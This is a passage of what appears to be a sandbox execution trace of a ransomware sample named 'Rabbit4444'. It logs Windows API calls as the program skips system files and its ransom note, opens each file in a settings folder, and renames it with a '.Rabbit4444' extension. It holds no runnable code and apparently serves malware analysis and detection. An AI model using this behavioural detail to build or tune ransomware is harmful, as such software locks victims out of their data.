Flags=0x8, Size=0x208) returned 0x124d90 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.177] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15048793619) returned 1 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.177] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.177] CloseHandle (hObject=0x298) returned 1 [0059.177] CloseHandle (hObject=0x278) returned 1 [0059.177] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms.Rabbit4444") returned 192 [0059.178] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.179] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a41fce, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53a41fce, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", cAlternateFileName="CL8B53~1.SET")) returned 1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2=".") returned 1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="..") returned 1 [0059.180] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="windows") returned -1 [0059.181] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.181] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.181] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="boot") returned 1 [0059.181] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.181] lstrcmpiW (lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.181] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms" | out: lpString1="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms") returned="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms" [0059.181] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.181] lstrlenW (lpString="Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms") returned 64 [0059.181] lstrlenW (lpString="Rabbit4444") returned 10 [0059.181] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.181] lstrlenW (lpString=".dll") returned 4 [0059.181] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.181] lstrlenW (lpString=".lnk") returned 4 [0059.181] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.181] lstrlenW (lpString=".ini") returned 4 [0059.181] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.181] lstrlenW (lpString=".sys") returned 4 [0059.181] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{91ba8e01-f854-4418-a108-e63323ddae60}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.182] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.182] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15049257669) returned 1 [0059.182] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=981) returned 1 [0059.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.182] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.184] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.185] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.185] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.185] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.186] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15049632708) returned 1 [0059.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.186] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.186] CloseHandle (hObject=0x298) returned 1 [0059.186] CloseHandle (hObject=0x278) returned 1 [0059.186] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms.Rabbit4444") returned 192 [0059.186] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{91ba8e01-f854-4418-a108-e63323ddae60}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{91ba8e01-f854-4418-a108-e63323ddae60}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.187] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ada905, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53ada905, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", cAlternateFileName="CLD764~1.SET")) returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2=".") returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="..") returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="windows") returned -1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="boot") returned 1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.187] lstrcmpiW (lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.187] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms" | out: lpString1="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms") returned="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms" [0059.187] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.188] lstrlenW (lpString="Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms") returned 64 [0059.188] lstrlenW (lpString="Rabbit4444") returned 10 [0059.188] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.188] lstrlenW (lpString=".dll") returned 4 [0059.188] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.188] lstrlenW (lpString=".lnk") returned 4 [0059.188] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.188] lstrlenW (lpString=".ini") returned 4 [0059.188] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.188] lstrlenW (lpString=".sys") returned 4 [0059.188] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9389633e-8bcb-4448-93cd-ebffa0759257}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.188] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.188] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15049898242) returned 1 [0059.188] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1149) returned 1 [0059.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.188] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0059.190] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0059.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.191] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15050194557) returned 1 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.191] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.191] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.191] CloseHandle (hObject=0x298) returned 1 [0059.191] CloseHandle (hObject=0x278) returned 1 [0059.191] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms.Rabbit4444") returned 192 [0059.192] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9389633e-8bcb-4448-93cd-ebffa0759257}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9389633e-8bcb-4448-93cd-ebffa0759257}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.192] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53b7326a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53b7326a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x220f9a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", cAlternateFileName="CL5ED8~1.SET")) returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2=".") returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="..") returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="windows") returned -1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="boot") returned 1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.193] lstrcmpiW (lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.193] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms" | out: lpString1="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms") returned="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms" [0059.193] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.193] lstrlenW (lpString="Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms") returned 64 [0059.193] lstrlenW (lpString="Rabbit4444") returned 10 [0059.193] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.193] lstrlenW (lpString=".dll") returned 4 [0059.193] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.193] lstrlenW (lpString=".lnk") returned 4 [0059.193] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.193] lstrlenW (lpString=".ini") returned 4 [0059.193] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.193] lstrlenW (lpString=".sys") returned 4 [0059.194] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.194] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9430db91-b966-4971-a955-e3dba1f889e7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.194] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.194] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15050462452) returned 1 [0059.194] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1074) returned 1 [0059.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.194] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0059.195] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0059.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.196] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.196] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.196] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.196] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.196] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15050717807) returned 1 [0059.196] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.197] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.197] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.197] CloseHandle (hObject=0x298) returned 1 [0059.197] CloseHandle (hObject=0x278) returned 1 [0059.197] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms.Rabbit4444") returned 192 [0059.197] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9430db91-b966-4971-a955-e3dba1f889e7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9430db91-b966-4971-a955-e3dba1f889e7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.198] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c0bc1a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53c0bc1a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", cAlternateFileName="CLF3F6~1.SET")) returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2=".") returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="..") returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="windows") returned -1 [0059.198] lstrcmpiW 